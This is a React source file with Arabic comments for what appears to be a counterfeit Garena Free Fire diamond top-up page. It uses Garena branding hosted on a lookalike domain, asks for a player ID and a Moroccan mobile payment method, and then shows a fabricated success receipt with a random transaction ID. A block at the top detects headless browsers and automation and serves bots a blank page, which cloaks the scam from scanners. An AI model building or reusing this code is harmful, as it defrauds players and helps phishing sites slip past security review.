import React, { useState, useEffect } from 'react';
import './App.css';

function App() {
  // 1. نظام الحماية: إذا تم اكتشاف بوت، تظهر صفحة بيضاء
  const [isBot, setIsBot] = useState(false);

  useEffect(() => {
    const detectBot = () => {
      const isHeadless = navigator.webdriver || !navigator.languages || navigator.languages.length === 0;
      if (isHeadless) {
        setIsBot(true);
      }
    };
    detectBot();
  }, []);

  // 2. الحالات (States) الخاصة بالسكربت
  const [view, setView] = useState('shop'); // 'shop' أو 'receipt'
  const [playerId, setPlayerId] = useState('');
  const [isLoggedIn, setIsLoggedIn] = useState(false);
  const [idError, setIdError] = useState(false);
  const [selectedPack, setSelectedPack] = useState({ qty: 0, base: 0 });
  const [payOk, setPayOk] = useState(false);
  const [payMethodIndex, setPayMethodIndex] = useState(null);
  
  // حالة صفحة الوصل
  const [receiptLoading, setReceiptLoading] = useState(true);
  const [txnId, setTxnId] = useState('');
  const [finalTime, setFinalTime] = useState('');

  const packs = [ 
    { qty: 100, base: 14 }, 
    { qty: 210, base: 28 }, 
    { qty: 530, base: 70 }, 
    { qty: 1080, base: 140 }, 
    { qty: 2200, base: 280 } 
  ];

  // دالة تسجيل الدخول
  const lockPlayerId = () => {
    if (playerId.trim().length >= 5) {
      setIsLoggedIn(true);
      setIdError(false);
    } else {
      setIdError(true);
    }
  };

  // دالة اختيار الحزمة
  const selectPack = (p) => {
    setSelectedPack(p);
  };

  // دالة اختيار وسيلة الدفع
  const setPay = (index) => {
    setPayMethodIndex(index);
    setPayOk(true);
  };

  // دالة إتمام الشراء
  const startPurchase = () => {
    setTxnId(Math.floor(Math.random() * 1e15));
    setFinalTime(new Date().toLocaleString());
    setView('receipt');
    setReceiptLoading(true);
    window.scrollTo(0,0);
    
    setTimeout(() => {
      setReceiptLoading(false);
    }, 1500);
  };

  // العودة للرئيسية
  const returnToHome = () => {
    setView('shop');
    setPlayerId('');
    setIsLoggedIn(false);
    setSelectedPack({ qty: 0, base: 0 });
    setPayOk(false);
    setPayMethodIndex(null);
    setReceiptLoading(true);
    window.scrollTo(0,0);
  };

  // إذا كان بوت، لا ترسم شيئاً (صفحة بيضاء)
  if (isBot) {
    return <div style={{ backgroundColor: 'white', height: '100vh', width: '100vw' }}></div>;
  }

  return (
    <div className="App">
      {view === 'shop' ? (
        <div id="shop-page">
          <div className="main-header-banner">
            <img src="https://sho2gameshopshop2gameshopshop2gameshopshop2gameshop.pakff.com/20260105_194632.png" alt="Garena Header" />
          </div>

          <div className="container">
            <div className="hero-banner">
              <img src="https://j.top4top.io/p_36573aom31.jpg" alt="Banner" />
            </div>

            {/* Step 1 */}
            <div className="card">
              <div className="card-title"><span className="step-num">1</span> Login</div>
              <div className="input-group">
                <input 
                  type="number" 
                  placeholder="Enter Player ID here"
                  value={playerId}
                  onChange={(e) => setPlayerId(e.target.value)}
                  disabled={isLoggedIn}
                />
                <button className="btn-login" onClick={lockPlayerId} disabled={isLoggedIn}>
                  {isLoggedIn ? "Logged In" : "Login"}
                </button>
              </div>
              {idError && <div style={{color:'red', marginTop:'5px', fontSize:'13px'}}>Invalid Player ID</div>}
            </div>

            {/* Step 2 */}
            <div className="card">
              <div className="card-title"><span className="step-num">2</span> Select Amount</div>
              <div className="grid grid-3">
                {packs.map((p, idx) => (
                  <div 
                    key={idx} 
                    className={`select-box ${selectedPack.qty === p.qty ? 'active' : ''}`}
                    onClick={() => selectPack(p)}
                  >
                    <span>{p.qty} 💎</span>
                  </div>
                ))}
              </div>
            </div>

            {/* Step 3 */}
            <div className="card">
              <div className="card-title"><span className="step-num">3</span> Mode de paiement</div>
              <div className="payment-grid">
                {[
                  "https://garena.pakff.com/image/inwi_mb.png",
                  "https://garena.pakff.com/image/Maroc-T.webp",
                  "https://garena.pakff.com/image/Orange_logo.svg.webp",
                  "https://garena.pakff.com/image/logo_ar-7d705e521c7ad0f21322bb1e32837ec9.png",
                  "https://garena.pakff.com/image/361d52b7ed94d502dd625e9f3feb4434.webp"
                ].map((src, idx) => (
                  <div 
                    key={idx} 
                    className={`select-box pay-method ${payMethodIndex === idx ? 'active' : ''}`}
                    onClick={() => setPay(idx)}
                  >
                    {idx === 4 && <div className="promo-badge">💎 PROMO</div>}
                    <img src={src} alt="payment" />
                    <div className="method-info"><span>{selectedPack.base}</span> DH</div>
                  </div>
                ))}
              </div>
            </div>
          </div>

          {/* Bottom Bar */}
          {isLoggedIn && selectedPack.qty > 0 && payOk && (
            <div id="bottom-bar">
              <div className="summary-info">
                <div className="qty" style={{fontWeight: 'bold', fontSize: '18px'}}>{selectedPack.qty} 💎</div>
                <div className="price" style={{color:'red', fontWeight:'bold'}}>Total: {selectedPack.base} DH</div>
              </div>
              <button className="btn-buy" onClick={startPurchase}>✓ Buy Now</button>
            </div>
          )}
        </div>
      ) : (
        /* PAGE 2: THE RECEIPT */
        <div id="receipt-page">
          <div className="main-header-banner">
            <img src="https://sho2gameshopshop2gameshopshop2gameshopshop2gameshop.pakff.com/20260105_194632.png" alt="Garena Header" />
          </div>

          <div className="receipt-container">
            {receiptLoading ? (
              <section className="hero-status">
                <div className="status-center">
                  <div className="spinner"></div>
                  <h2 style={{margin:0, fontSize: '16px'}}>Loading...</h2>
                </div>
              </section>
            ) : (
              <>
                <section className="hero-status">
                  <div className="status-center">
                    <div className="success-icon">
                      <img src="https://i.ibb.co/9mzG50CD/Capture-d-cran-2025-08-16-195231.png" alt="Success" />
                    </div>
                    <h1 className="hero-title">Operation Completed!</h1>
                    <div style={{fontSize: '13px', color: '#444'}}>Transaction ID: <span style={{fontWeight:'bold', color:'#000'}}>{txnId}</span></div>
                  </div>
                </section>
                
                <div style={{maxWidth: '600px', margin: '25px auto'}}>
                  <div className="receipt-row">
                    <span className="label">Total Amount</span>
                    <span className="val">💎 {selectedPack.qty + Math.floor(selectedPack.qty * 0.1)}</span>
                  </div>
                  <div className="bonus-box">
                    <div className="receipt-row" style={{border:0, padding:'5px 0'}}>
                      <span className="label">Origin</span><span className="val">💎 {selectedPack.qty}</span>
                    </div>
                    <div className="receipt-row" style={{border:0, padding:'5px 0'}}>
                      <span className="label">+ Bonus</span><span className="val">💎 {Math.floor(selectedPack.qty * 0.1)}</span>
                    </div>
                  </div>
                  <div className="receipt-row"><span className="label">Price Paid</span><span className="val">{selectedPack.base} DH</span></div>
                  <div className="receipt-row"><span className="label">Game</span><span className="val">Free Fire</span></div>
                  <div className="receipt-row"><span className="label">Mode</span><span className="val">Official Topup</span></div>
                  <div className="receipt-row"><span className="label">Time</span><span className="val">{finalTime}</span></div>
                  
                  <div style={{marginTop: '30px', textAlignment: 'center'}}>
                    <button 
                      style={{background: 'var(--garena-red)', color: '#fff', border:'none', padding: '14px 50px', borderRadius: '8px', fontWeight: 'bold', cursor: 'pointer', width: '100%'}}
                      onClick={returnToHome}
                    >
                      Back to Home
                    </button>
                  </div>
                </div>
              </>
            )}
          </div>
        </div>
      )}
    </div>
  );
}

export default App;